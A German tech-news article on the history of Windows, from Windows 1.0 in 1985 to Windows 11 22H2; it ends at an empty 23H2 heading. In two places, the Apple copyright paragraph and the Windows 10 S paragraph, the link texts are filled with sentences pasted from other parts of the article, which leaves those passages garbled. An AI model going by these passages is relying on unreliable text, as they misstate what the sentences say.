<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/04/orig_Microsoft_Win1.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Windows 1.0 16z9" class="wp-image-3951540" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Microsoft bringt Windows 1.0 am 20. November 1985 auf den Markt. Knapp 40 Jahre später blicken wir zurück auf die Erfolgsgeschichte des Windows-Betriebssystems.</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p>Am 20. November 1985 veröffentlicht die damals noch kleine Softwarefirma Microsoft mit <a href="https://www.computerwoche.de/article/2654393/der-lange-reifeprozess.html" title="Windows 1.0 die erste grafische Benutzeroberfläche" target="_blank">Windows 1.0 die erste grafische Benutzeroberfläche</a> für ihr <a href="https://de.wikipedia.org/wiki/MS-DOS" title="Betriebssystem MS-DOS" target="_blank" rel="noopener">Betriebssystem MS-DOS</a>. Zunächst nur als Erweiterung des Betriebssystems programmiert, legt <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 1.0 den Grundstein für eine beispiellose Erfolgsgeschichte. Anwendungen auf MS-DOS-Rechnern lassen sich nun endlich mit der Maus bedienen und machen die grauen Kisten somit auch für den Consumer-Markt attraktiv.</p>



<h2 class="wp-block-heading">Die Anfänge von Windows</h2>



<p>Um die erste grafische Oberfläche für die Benutzung von PCs entbrennt vor 30 Jahren allerdings zunächst ein Wettlauf gegen die Zeit. <a href="https://www.computerwoche.de/article/2747977/so-machen-sie-ihren-pc-schneller-und-stabiler.html" title="Personal Computer" target="_blank">Personal Computer</a> werden zu dieser Zeit in der Regel in Unternehmen eingesetzt. <a href="https://www.computerwoche.de/article/2728076/bill-gates-wird-60.html" title="Bill Gates" target="_blank">Bill Gates</a> wird schnell klar, dass eine grafische Oberfläche (<a href="https://de.wikipedia.org/wiki/Grafische_Benutzeroberfl%C3%A4che" title="Graphical User Interface, GUI" target="_blank" rel="noopener">Graphical User Interface, GUI</a>) notwendig sein würde, damit der Computer eines Tages auf jedem Schreibtisch seinen Platz findet.</p>



<p>Unter Microsofts erstem Betriebssystem MS-DOS müssen Anwender schon über ein gewisses technisches Know-how verfügen, um den Rechner bedienen zu können. Grundkenntnisse in der <a title="Programmiersprache Basic" href="https://www.computerwoche.de/article/2766783/programmieren-fuer-die-massen-50-jahre-basic.html" target="_blank">Programmiersprache Basic</a> sind damals von Vorteil. Die erste Version von <a class="idgGlossaryLink" href="https://www.computerwoche.de/operating-systems/" target="_blank">Windows</a> hat allerdings noch recht wenig Ähnlichkeit mit den grafischen Oberflächen, wie man sie heute kennt. Die Software ist sperrig, langsam und wird nur von wenigen Anwendungen überhaupt unterstützt. Will man ein kleines Programm wie den Taschenrechner starten, muss die dafür erforderliche Datei (calc.exe) erst in den Tiefen des Betriebssystems gesucht und anschließend über die <a title="Kommandozeile" href="https://de.wikipedia.org/wiki/Kommandozeile" target="_blank" rel="noopener">Kommandozeile</a> gestartet werden.</p>



<p>Die anfangs rudimentäre grafische Oberfläche ist damals revolutionär – von Microsoft stammt die Idee allerdings nicht. Bereits zwei Jahre zuvor – 1983 – bringt <a href="https://www.computerwoche.de/article/2728315/das-sagt-apple-ceo-tim-cook-zum-neuen-kinofilm.html" title="Apple-Gründer Steve Jobs" target="_blank">Apple-Gründer Steve Jobs</a> mit der <a href="https://www.computerwoche.de/article/2712435/die-computermaus-feiert-40-geburtstag.html" title="Lisa" target="_blank">Lisa</a> einen der ersten Computer mit grafischer Oberfläche auf den Markt. Das Gerät ist jedoch teuer und spricht schon deshalb nur einen kleinen Kreis von Computer-Enthusiasten an. Doch die Richtung ist vorgegeben, der Wettlauf beginnt.</p>



<p>Jobs und die Programmierer bei Apple lassen sich bei ihrer Entwicklung der GUI von der Arbeit am legendären kalifornischen Forschungszentrum <a href="https://www.computerwoche.de/article/2719700/happy-birthday-macintosh.html" title="Xerox PARC" target="_blank">Xerox PARC</a> inspirieren. Dort wird die Idee der grafischen Benutzeroberfläche für PCs geboren. Bereits in den 1970er Jahren entsteht dort der <a href="https://www.computerwoche.de/article/2605978/der-lange-weg-zu-besseren-guis.html" title="Xerox Alto" target="_blank">Xerox Alto</a> für Forschungszwecke. Nachdem 1981 der Xerox Star als erster kommerzieller Rechner floppt, gibt das Unternehmen sein Vorhaben auf.</p>



<h2 class="wp-block-heading">Microsoft, Apple und das Urheberrecht</h2>



<p>Durch Apple unter Zugzwang geraten, kündigt Bill Gates im November 1983 auf der Computermesse Comdex in Las Vegas sein <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 1.0 an – lange bevor die Software überhaupt fertig ist. Als Anekdote ist überliefert, dass Gates’ Vater bei seinem Vortrag am Diaprojektor stand. Fast zwei Jahre braucht Microsoft anschließend, bis die erste Windows-Version auf den Markt kommt. In der Zwischenzeit stellt auch Apple seinen ersten PC auf die Beine: <a href="https://www.computerwoche.de/article/2662384/die-turbulente-apple-story.html" title="den Macintosh" target="_blank">den Macintosh</a>.</p>



<p>Gates nimmt sich für <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> relativ unverhohlen die Oberfläche des <a href="https://www.computerwoche.de/article/2760875/mac-oder-pc-ein-test-ueber-zehn-runden.html" title="Jobs und die Programmierer bei Apple lassen sich bei ihrer Entwicklung der GUI von der Arbeit am legendären kalifornischen Forschungszentrum " target="_blank">Jobs und die Programmierer bei Apple lassen sich bei ihrer Entwicklung der GUI von der Arbeit am legendären kalifornischen Forschungszentrum </a> zum Vorbild. Die Anwälte der Apfel-Company kann er sich nur vom Hals halten, weil er für Apple dringend benötigte Mac-Anwendungen liefert. Als Microsoft aber Anfang 1988 mit dem nächsten größeren Versionssprung, <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 2.03, auf den Markt stößt, reicht Apple wegen Verstoßes gegen das Urheberrecht Klage gegen seinen Rivalen ein. Den über Jahre erbittert geführten Rechtsstreit verliert Apple letztendlich im Jahr 1994 – auch deshalb, weil es sich in den 1980er Jahren selbst bei Xerox bedient hatte.</p>



<p>Erst im Sommer 1997 normalisiert sich die Beziehung zwischen Apple und Microsoft langsam wieder, als der zu Apple zurückgekehrte Steve Jobs die Hilfe von Microsoft in Anspruch nimmt, um das in Schwierigkeiten geratene Unternehmen wieder profitabel zu machen. Nichtsdestotrotz nimmt Apple seinen “Lieblings”-Kontrahenten und dessen “Kopierleidenschaft” auch Jahre später noch aufs Korn – mit Vorliebe in Form ironischer Werbespots.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<h2 class="wp-block-heading">Durchbruch und Millenium-Fluch</h2>



<p>Zum Start von <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 1.0 gibt es weltweit eine Basis von “lediglich” sechs Millionen Personal Computer. Erst rund fünf Jahre später, im Jahr 1990, gelingt der Software-Schmiede aus Redmond mit Windows 3.0 ein erster Erfolg. Den endgültigen Durchbruch beschert dem Unternehmen dann weitere fünf Jahre später der Release von Windows 95. Unter Windows 95 lassen sich Peripheriegeräte wie Drucker deutlich einfacher anschließen und in Betrieb nehmen. Ohne umständliche Installation von Treibersoftware kommen die Nutzer dennoch nur selten aus. Erstmals kommt <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 1995 auch mit einem virtuellen Papierkorb auf der Schreibtischoberfläche daher – ein Icon, das Macintosh-Nutzer der ersten Stunde zu dieser Zeit längst kennen. Auch eine Verbindung zum Internet können Nutzer mit Windows 95 erstmals herstellen: mit dem <a href="https://www.computerwoche.de/article/2712908/microsoft-schafft-browser-klarheit-fuer-windows-10.html" title="Internet Explorer" target="_blank">Internet Explorer</a>.</p>



<p>Das 1998 erschienene <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 98 wird im Vergleich zu seinem Vorgänger nur in Details weiterentwickelt. Bei diesen Details handelt es sich konkret um die standardmäßige Einbindung des Internet Explorers in das Windows-Betriebssystem, sowie die Einführung der Schnellstartleiste und die Unterstützung der damals neuen <a href="https://www.computerwoche.de/article/2777857/so-nutzen-sie-usb-weiter-sicher.html" title="USB-Schnittstelle" target="_blank">USB-Schnittstelle</a>. Mit der im Jahr 2000 erschienenen <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> Millenium Edition (ME) kann Microsoft bei PC-Nutzern dagegen nicht punkten. Das auf Multimedia-Support optimierte Betriebssystem soll Windows-User mit mehr Benutzerfreundlichkeit verwöhnen, in der Praxis “besticht” es vor allem mit Instabilität und mangelhafter Performance.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Windows ME gilt als einer der größten OS-Flops aus Redmond." title="Windows ME gilt als einer der größten OS-Flops aus Redmond." src="https://images.computerwoche.de/bdb/2669329/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Windows ME gilt als einer der größten OS-Flops aus Redmond.</p></figcaption></figure><p class="imageCredit">
					Foto: Microsoft</p></div>




<h2 class="wp-block-heading">XP-Kult und Vista-Fehlschlag</h2>



<p>Mit <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> XP erneuert Microsoft im Jahr 2001 die optische Präsentation von Windows. Und auch technisch halten viele Neuerungen Einzug. Insbesondere auf Notebooks macht <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> nun eine deutlich bessere Figur. Das weiß auch die schreibende Gilde zu schätzen: Pünktlich zum Release erhält Windows XP auch von der Presse gute Noten. Anwender schätzen insbesondere die Navigation über das Startmenü. Windows XP gibt es auch als <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a> PC Edition – aus gutem Grund: Im Jahr 2002 startet Microsoft in Kooperation mit einigen OEMs eine große Tablet-Offensive. Die Windows-<a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> können sich jedoch nur in vertikalen Märkten wie dem Gesundheitswesen etablieren. <br><br>Der <a href="https://www.computerwoche.de/article/2754872/berlin-verschlaeft-windows-xp-abloesung.html" title="Support von Windows XP" target="_blank">Support von Windows XP</a> endet im Jahr 2014 nach 13 Jahren. Dennoch können sich viele Unternehmen, Institutionen und Privatpersonen nur schwer vom äußerst beliebten <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Betriebssystem trennen. Für Microsoft ist Windows XP in diesen Jahren eines der meistverkauften Produkte. Der XP-Nachfolger Windows Vista wird dagegen von vielen Experten <a href="https://www.computerwoche.de/article/2869576/warum-vista-keine-chance-bekommt.html" title="nicht gerade als Erfolgskapitel" target="_blank">nicht gerade als Erfolgskapitel</a> der <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Geschichte angesehen. Das Windows-OS soll zunächst bereits 2003 auf den Markt kommen, fertiggestellt wird das Projekt mit dem Codenamen “Longhorn” allerdings erst Ende 2006. Mit der umfangreichen, visuellen Neugestaltung von Windows Vista will Microsoft auch ein Zeichen setzen: Apples Betriebssystem Mac OS X macht zu diesem Zeitpunkt einen deutlich frischeren, moderneren Eindruck als <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> XP. Die neue “Aero”-Oberfläche, ein neu designtes Startmenü und zeitgemäß inszenierte Icons sowie viele technische Neuerungen zeichnen Windows Vista aus. Trotzdem kommt diese Windows-Version bei vielen Kunden nicht an – Stabilität und Performance können mit den Erwartungen vieler User nicht mithalten. So landet Vista oft nur bei Endkunden, die es mit neuen Systemen erwerben. Insbesondere im Unternehmensumfeld bleibt XP das Maß der Dinge.</p>



<h2 class="wp-block-heading">Windows 7 und die Solidarität mit dem Start-Button</h2>



<p><a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 7 gilt entsprechend als der eigentlich legitime Nachfolger von Windows XP. Gegenüber Vista kann <a href="https://www.computerwoche.de/k/windows-7,3470" target="_blank" class="idgGlossaryLink">Windows 7</a> in Sachen Stabilität, Performance und Nutzerfreundlichkeit bei den Nutzern schnell punkten. Auch kurz vor dem Erscheinen von Windows 10 verzeichnet <a href="https://www.computerwoche.de/operating-systems/" title="Windows 7" target="_blank">Windows 7</a> immer noch die höchsten Marktanteile unter den <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Betriebssystemen.</p>



<p>Mit <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 8 ändert sich die Bedienung des Betriebssystems grundlegend: Die neue Kacheloberfläche lässt sich auf touch-fähigen Geräten zwar gut bedienen, stößt aber viele Desktop-Anwender vor den Kopf, die die Änderung der Benutzerführung oft als zu radikal empfinden. <a href="https://www.computerwoche.de/article/2768296/alle-windows-8-1-update-1-editionen-im-vergleich.html" title="Drittanbieter-Tools die die beliebte Windows-Leiste mit Start-Button zurückbringen" target="_blank">Drittanbieter-Tools die die beliebte Windows-Leiste mit Start-Button zurückbringen</a>, haben zu diesem Zeitpunkt Hochkonjunktur. Nur ein Jahr später muss Microsoft reagieren und renoviert <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 8 grundlegend. Das Ergebnis nennt man kurzerhand <a href="https://www.computerwoche.de/k/windows-8,3464" target="_blank" class="idgGlossaryLink">Windows 8</a>.1. Der Startbildschirm ist unter <a href="https://www.computerwoche.de/article/2768296/alle-windows-8-1-update-1-editionen-im-vergleich.html" title="Windows 8.1" target="_blank">Windows 8.1</a> nun flexibler konfigurierbar, auf Wunsch ist nun auch wieder die klassische <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Desktop-Ansicht verfügbar – inklusive Startknopf. Abseits der Diskussionen um das Für und Wider der <a href="https://www.computerwoche.de/article/2717785/windows-8-die-kacheln-im-griff.html" title="Kachel-Oberfläche" target="_blank">Kachel-Oberfläche</a> geht oft unter, dass <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 8 – und insbesondere auch <a href="https://www.computerwoche.de/k/windows-8,3464" target="_blank" class="idgGlossaryLink">Windows 8</a>.1 – einige spannende Neuerungen an Bord haben, wie etwa Speicherpools oder Arbeitsordner.</p>



<h2 class="wp-block-heading">Windows 10 und das “neue” Microsoft</h2>



<p>Mit <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 10 veröffentlichte Microsoft Ende Juli 2015 nicht nur einfach eine neue Windows-Version. Das aktuelle Windows-OS verkörpert die neue <a href="https://www.computerwoche.de/article/2785610/microsoft-baut-plattformstrategie-auf-windows-10-und-azure.html" target="_blank">“One-Platform”-Strategie</a> des Redmonder IT-Konzerns, der mit <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 10 und Windows 10 Mobile künftig eine geräteklassenübergreifende Plattform etablieren will. Windows 10 läuft also nicht nur auf PCs, sondern auch auf <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-PCs, Notebooks, <a href="https://www.computerwoche.de/article/2729208/gigaset-me-pro-gegen-microsoft-lumia-950.html" title="Windows Phones" target="_blank">Windows Phones</a>, der Spielkonsole <a href="https://www.computerwoche.de/article/2729145/windows-10-update-ist-ab-sofort-verfuegbar.html" title="Xbox One" target="_blank">Xbox One</a> und dem kommenden <a href="https://www.computerwoche.de/article/2724269/microsoft-hololens-ar-brille-mit-windows-10.html" title="AR-Device Hololens" target="_blank">AR-Device Hololens</a>. Weitergeführt werden soll diese Strategie von plattformübergreifenden “Universal”-Apps. Doch auch sonst ändert sich Einiges: <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 10 wurde als erstes OS der Windows-Geschichte allen Nutzern von <a href="https://www.computerwoche.de/k/windows-7,3470" target="_blank" class="idgGlossaryLink">Windows 7</a>, 8 und 8.1 als kostenloses Upgrade zur Verfügung gestellt und wird kontinuierlich über Software-Updates erweitert. Das heißt bei Microsoft “Windows-as-a-Service” – und sorgt dafür, dass der traditionelle Patch-Day endgültig Geschichte ist. Dass Microsoft mit <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 10 neue Wege beschreitet, zeigte sich bereits während des Entwicklungsprozesses: Über das “Insider Program” waren beziehungsweise sind Millionen von Anwender mit ihrem Feedback in die Entwicklung des Betriebssystems involviert.</p>



<p>Mit Windows 10 beschreitet Microsoft auch beim <a title="Thema Open Source neue Wege" href="https://www.computerwoche.de/article/2741136/microsoft-freundet-sich-mit-open-source-an.html" target="_blank">Thema Open Source neue Wege</a> und öffnet sich der Community. So soll das Win 10 Anniversary Update auch mit integriertem Ubuntu Bash kommen, während <a class="idgGlossaryLink" href="https://www.computerwoche.de/operating-systems/" target="_blank">Windows</a> Server 2016 weitergehende <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank">Linux</a>-Virtualisierungen erlaubt. Doch nicht nur Linux, auch andere <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank">Open-Source</a>-Projekte werden künftig unterstützt: Sowohl das .NET-Framework, als auch die Entwicklungsumgebung Visual Studio stellt Microsoft für Entwickler kostenlos zur Verfügung.</p>



<h2 class="wp-block-heading">Windows 10 Creators Update</h2>



<p>Ende Oktober 2016 kündigt Microsoft das nächste umfassende Update für sein Betriebssystem an. Das <a href="https://www.computerwoche.de/article/2747959/windows-10-creators-update-offiziell-angekuendigt.html" title="Creators Update" target="_blank">Creators Update</a> soll im Frühjahr 2017 gewichtige Neuerungen auf alle <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-10-Geräte bringen – insbesondere was die Bereiche Mixed- und Virtual-Reality angeht. Geht es nach den Redmondern, soll künftig jeder Windows 10 User ganz einfach und schnell eigene 3D-Inhalte erstellen und bearbeiten können. Das soll in erster Linie über eine Erweiterung von Paint funktionieren, das künftig Paint 3D heißt. Auch beliebige, abfotografierte Objekte sollen künftig per App auf Knopfdruck in 3D-Modelle verwandelt werden können. Konsumiert werden sollen die MR- und VR-Inhalte zum einen über <a href="https://www.computerwoche.de/article/2724269/microsoft-hololens-ar-brille-mit-windows-10.html" title="Microsofts Hololens" target="_blank">Microsofts Hololens</a>, zum anderen auch über VR-Brillen diverser Partnerhersteller, etwa Lenovo, Dell und HP. Auch die <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 10 Community soll künftig noch stärker zusammenwachsen, wenn es nach Microsoft geht. Deswegen stellen die Redmonder im Rahmen des Creators Update auch eine Schnittstelle zur Verfügung, die zahlreiche Kommunikationstools miteinander vereinen soll. </p>



<h2 class="wp-block-heading">Windows 10 S und Creators Update, Part 2</h2>



<p>Anfang Mai 2017 stellte Microsoft mit dem <a href="https://www.computerwoche.de/article/2757947/microsoft-stellt-surface-laptop-vor.html" title="Surface Laptop" target="_blank">Surface Laptop</a> nicht nur ein weiteres Gerät der Surface-Reihe vor, sondern enthüllte auch <a href="https://www.pcwelt.de/article/1164728/windows-10-s-alle-infos-zum-neuen-windows-10-light.html" title="soll im Frühjahr 2017 gewichtige Neuerungen auf alle Windows-10-Geräte bringen - insbesondere was die Bereiche Mixed- und Virtual-Reality angeht. Geht es nach den Redmondern, soll künftig jeder Windows 10 User ganz einfach und schnell eigene 3D-Inhalte erstellen und bearbeiten können. Das soll in erster Linie über eine Erweiterung von Paint funktionieren, das künftig Paint 3D heißt. Auch beliebige, abfotografierte Objekte sollen künftig per App auf Knopfdruck in 3D-Modelle verwandelt werden können. Konsumiert werden sollen die MR- und VR-Inhalte zum einen über" target="_blank">soll im Frühjahr 2017 gewichtige Neuerungen auf alle Windows-10-Geräte bringen – insbesondere was die Bereiche Mixed- und Virtual-Reality angeht. Geht es nach den Redmondern, soll künftig jeder Windows 10 User ganz einfach und schnell eigene 3D-Inhalte erstellen und bearbeiten können. Das soll in erster Linie über eine Erweiterung von Paint funktionieren, das künftig Paint 3D heißt. Auch beliebige, abfotografierte Objekte sollen künftig per App auf Knopfdruck in 3D-Modelle verwandelt werden können. Konsumiert werden sollen die MR- und VR-Inhalte zum einen über</a>. Die cloudbasierte Version von <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 10 läuft ausschließlich mit Apps aus dem Windows Store, ist jedoch upgrade-fähig. Die abgespeckte Windows-Version ist mit dem eingestellten RT vergleichbar und richtet sich in erster Linie an Bildungseinrichtungen. Schließlich will Microsoft dieses Feld nicht alleine den <a href="https://www.computerwoche.de/article/2718031/2015-werden-gut-7-millionen-chromebooks-verkauft.html" title=", zum anderen auch über VR-Brillen diverser Partnerhersteller, etwa Lenovo, Dell und HP. Auch die Windows 10 Community soll künftig noch stärker zusammenwachsen, wenn es nach Microsoft geht. Deswegen stellen die Redmonder im Rahmen des Creators Update auch eine Schnittstelle zur Verfügung, die zahlreiche Kommunikationstools miteinander vereinen soll." target="_blank">, zum anderen auch über VR-Brillen diverser Partnerhersteller, etwa Lenovo, Dell und HP. Auch die Windows 10 Community soll künftig noch stärker zusammenwachsen, wenn es nach Microsoft geht. Deswegen stellen die Redmonder im Rahmen des Creators Update auch eine Schnittstelle zur Verfügung, die zahlreiche Kommunikationstools miteinander vereinen soll.</a> überlassen. </p>



<p>Auf der <a href="https://build.microsoft.com/" title="Entwicklerkonferenz Build 2017" target="_blank" rel="noopener">Entwicklerkonferenz Build 2017</a> kündigte Microsoft den Nachfolger zum Creators Update an: das Fall Creators Update. Unsere US-Kollegin Melissa Riofrio klärt Sie über die besten, neuen Features auf: </p>



<p>Seit April 2018 verzichtete Microsoft auf besondere Nomenklatur bei <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 10 Updates, verbessert sein Betriebssystem aber konsequent weiter und liefert dazu im Regelfall zwei große Updates pro Jahr. Die aktuelle Version (20H2) wurde im <a href="https://de.wikipedia.org/wiki/Microsoft_Windows_10#Version_20H2" title="Okotober 2020" target="_blank" rel="noopener">Okotober 2020</a> veröffentlicht.</p>



<p>Aufmerksame Leser werden bemerkt haben, dass in diesem Text nicht auf jede <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Version eingegangen wird. Natürlich haben wir auch Windows NT, 2000 und wie sie alle heißen nicht vergessen – in unserer Bildergalerie bekommen Sie einen umfassenden Überblick über die wichtigsten Windows-Versionen. </p>



<h2 class="wp-block-heading">Windows 11 21H2</h2>



<p>Es begann mit einer überraschenden Ankündigung von Microsoft-CEO Satya Nadella auf der Entwicklerkonferenz <a href="https://www.computerwoche.de/article/2804624/nadella-die-welt-gehoert-den-entwicklern.html" title="Build 2021" target="_blank">Build 2021</a>: “Wir werden bald eines der bedeutendsten Updates für <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> des letzten Jahrzehnts vorstellen. Ich selbst habe es in den letzten Monaten schon ausprobiert und bin unglaublich aufgeregt, was die nächste Generation von Windows betrifft.” Damit befeuerte der Manager eine regelrechte Flut an <a href="https://www.computerwoche.de/article/2805032/viel-laerm-um-windows-11.html" title="Spekulationen rund um ein neues Windows" target="_blank">Spekulationen rund um ein neues Windows</a>. Am 24. Juni lösten sich dann alle bis dahin noch bestehenden Rätsel. Microsoft stellte mit <a href="https://www.computerwoche.de/article/2805089/microsoft-kuendigt-neuen-windows-aera-an.html" title="Windows 11" target="_blank">Windows 11</a> offiziell eine neue Generation seines Betriebssystems vor und erklärte, damit eine neue Ära einläuten zu wollen. </p>



<p>Die Idee, ein neues <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> zu bauen, entstand wohl in der Corona-Pandemie. Die vergangenen 18 Monate hätten die Art und Weise, wie Menschen den PC nutzen, komplett verändert, konstatierte Panos Panay, Chief Product Officer für den Bereich Windows und Devices bei Microsoft. Der PC habe das Leben in der Krise maßgeblich mitbestimmt. Man habe Windows 11 darauf ausgelegt, auf verschiedenen Gerätetypen zu laufen und unterschiedliche Bedienmodi zu unterstützen, hieß es von Seiten Microsofts. Beispielsweise sei der Abstand zwischen den Icons in der Taskleiste vergrößert worden, um eine Touch-Bedienung auf <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> zu erleichtern. Auch die Erkennung von Spracheingaben sei Microsoft zufolge verbessert worden. Alle aktuell im Handel verkauften PCs und Notebooks sollen Windows-11-tauglich sein, hieß es. Wie schon beim Umstieg auf Windows 10 will Microsoft Anwendern mit der PC Health Check App ein Tool anbieten, um zu prüfen, ob ihr Rechner <a href="https://www.computerwoche.de/article/2805175/laeuft-win-11-auf-ihrem-pc.html" title="für das neue Windows-System geeignet ist" target="_blank">für das neue Windows-System geeignet ist</a>.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p>Microsoft hat bei <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 vor allem Design und Bedienerführung vereinfacht. Mithilfe neuer Tools wie “Snap Layouts”, “Snap Groups” und “Desktops” sollen Nutzer ihren Arbeitsplatz besser organisieren können, verspricht der Softwarehersteller. So ließen sich beispielsweise mehrere separate Arbeitsoberflächen einrichten und mit Apps und Tools bestücken – etwa für die Arbeit, den Privatbereich oder die Schule. Darüber hinaus verzahnt Microsoft Windows 11 enger mit dem in der Pandemie so erfolgreichen Communication- und <a href="https://www.computerwoche.de/article/2795511/microsoft-teams-optimal-nutzen.html" title="Collaboration-Tool Teams" target="_blank">Collaboration-Tool Teams</a>. </p>



<p>Wieder zurück in <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> 11 sind die aus der Version 7 bekannten Widgets. Damit können Nutzer personalisierte Feeds mit beispielsweise Nachrichten oder Wetterinformationen einrichten. Der Redmonder Konzern bewirbt sein neues Betriebssystem darüber hinaus als besonders sicher. Die Architektur sei als Zero Trust angelegt, zudem sei das System Secure by Design. Wichtige Sicherheits-Features wie zum Beispiel <a href="https://www.computerwoche.de/article/2650080/faq-was-sie-ueber-verschluesselung-wissen-sollten.html" title="Verschlüsselung" target="_blank">Verschlüsselung</a> seien von Haus aus aktiviert. </p>



<p>Überarbeitet hat Microsoft auch den <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Appstore, der laut Panay nun übersichtlicher und auch einfacher zu nutzen sein soll. Darüber hinaus ließen sich künftig auch <a href="https://www.computerwoche.de/article/2805374/chromebook-vs-windows-laptop.html" title="Android-Apps" target="_blank">Android-Apps</a> über den Amazon Appstore in <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a> herunterladen. App-Entwicklern winken mit Windows 11 laut Panay mehr Freiheiten. Sie könnten beliebige App-Frameworks für ihre Entwicklungen nutzen. Apps ließen sich beispielsweise als Win32-, Progressive-Web-App (PWA) oder Universal-Windows-App (UWA) in den Store einstellen. </p>



<p>Um mehr Entwickler auf die <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Plattform zu locken, hat Microsoft auch seine Abrechnungsmodalitäten angepasst: Bringt ein Entwickler seine eigene Abrechnungs-Engine mit in den Windows-Store, will der Konzern keine Gebühren verlangen. Wird die im Windows-Store von Microsoft angebotene Commerce-Service genutzt, werden 15 Prozent vom Umsatz fällig. Die erste Version von Windows 11 – 21H2 – wurde im Oktober 2021 veröffentlicht.</p>



<h2 class="wp-block-heading">Windows 11 22 H2</h2>



<p>Im September 2022 erfolgte schließlich mit der Version <strong>22H2</strong> das erste große Update des neuen Microsoft-Betriebssystems, das zahlreiche Überarbeitungen beziehungsweise Optimierungen beinhaltete, sowohl auf Design- als auch auf Funktionsebene. Hervorzuheben ist dabei vor allem die von den Nutzern lange herbeigesehnte Möglichkeit, innerhalb des <a class="idgGlossaryLink" href="https://www.computerwoche.de/operating-systems/" target="_blank">Windows</a> Datei-Explorers Registerkarten zu öffnen. Unsere Kollegen von der PC-Welt haben das erste Windows-Update, beziehungsweise dessen Betaversion, ausgiebig <a href="https://www.youtube.com/watch?v=1Zn5sfWRxao" target="_blank" rel="noreferrer noopener">getestet und erklärt</a>.</p>



<h2 class="wp-block-heading">Windows 11 23H2</h2>



